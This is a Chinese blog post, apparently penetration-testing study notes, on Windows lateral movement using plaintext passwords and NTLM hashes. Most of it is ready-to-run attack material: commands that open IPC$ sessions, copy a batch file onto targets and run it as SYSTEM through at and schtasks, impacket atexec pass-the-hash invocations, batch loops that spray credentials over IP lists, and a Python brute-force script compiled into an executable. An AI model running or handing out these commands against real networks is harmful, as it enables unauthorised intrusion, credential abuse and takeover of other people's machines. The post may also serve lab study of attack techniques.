这篇文章上次修改于 185 天前,可能其部分内容已经发生变化,如有疑问可询问作者。

因为文本编辑器中/会被转义,因此复制过来的时候难免会有一些被转义看不到的,导致命令执行失败,发现错误可以提出来。

横向渗透明文传递 at&schtasks (注意是明文密码)

貌似只针对server,我物理机win10被克制了说拒绝复制,我估计是防火墙。做实验前记得关闭所有的防火墙,防止干扰。
相关链接:https://www.cnblogs.com/bmjoker/p/10355934.html
利用流程

  1. 建立 IPC 链接到目标主机
  2. 拷贝要执行的命令脚本到目标主机
  3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本
  4. 删除 IPC 链接

net use \\server\ipc$"password" /user:username 工作组
net use \\server\ipc$"password" /user:domain\username 域内
dir \\xx.xx.xx.xx\C$\ 查看文件列表
copy \\xx.xx.xx.xx\C$\1.bat 1.bat 下载文件
copy 1.bat \\xx.xx.xx.xx\C$ 复制文件
net use \\192.168.76.129\IPC$ /del 删除 IPC
net view xx.xx.xx.xx 查看对方共享

[at] & [schtasks]

at < Windows2012
net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator 建立 ipc 连接:
copy add.bat \\192.168.3.21\c$ 拷贝执行文件到目标机器
at \\192.168.3.21 15:47 c:\add.bat 添加计划任务

schtasks >=Windows2012
net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\administrator 建立 ipc 连接:
copy add.bat \\192.168.3.32\c$ 复制文件到其 C 盘 这里我采用的是
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F 创建 adduser 任务
对应执行文件
schtasks /run /s 192.168.3.32 /tn adduser /i 运行 adduser 任务
schtasks /delete /s 192.168.3.21 /tn adduser /f删除 adduser 任务

2012及以上ping不通的话,打开防火墙的入站规则就行
进入windows server,控制面板——右上角搜索框输入“防火墙”——检查防火墙状态——高级设置——入站规则——文件和打印机共享(回显请求-ICMPv4-In)(域,专用)——右键启用规则

net use 查看当前连接数

atexec-impacket

明文或HASH传递,同套件 impacket wmiexec的执行方式,下一篇文章有写到
atexec.exe ./administrator:Admin12345@192.168.3.21 "whoami"
atexec.exe god/administrator:Admin12345@192.168.3.21 "whoami"
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"
QQ截图20211105193335.jpg
注意了,我们这的hasher指的是NTLM不是sha1

Bat批量

FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #批量检测 IP 对应密码无回显
连接
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量检测 IP 对应密码
回显版
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami #批量检测密码对应 IP
回显版
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami #批量检测
HASH(指NTML) 对应 IP 回显版

python实现批量爆破连接

    import os,time
ips={
   '192.168.3.21',
   '192.168.3.25',
   '192.168.3.29',
   '192.168.3.30',
   '192.168.3.31',
   '192.168.3.33'
}
 
users={
   'Administrator',
   'boss',
   'dbadmin',
   'fileadmin',
   'mack',
   'mary',
   'vpnadm',
   'webadmin'
}
passs={
   'admin',
   'admin!@#45',
   'Admin12345'
}
 
for ip in ips:
   for user in users:
       for mima in passs:
           exec="net use \\"+ "\\"+ip+'\\ipc$ '+mima+' /user:god\\'+user
           print('--->'+exec+'<---')
           os.system(exec)
           time.sleep(1)

编译

pip install pyinstaller
pyinstaller -F fuck_neiwang_001.py 生成可执行EXE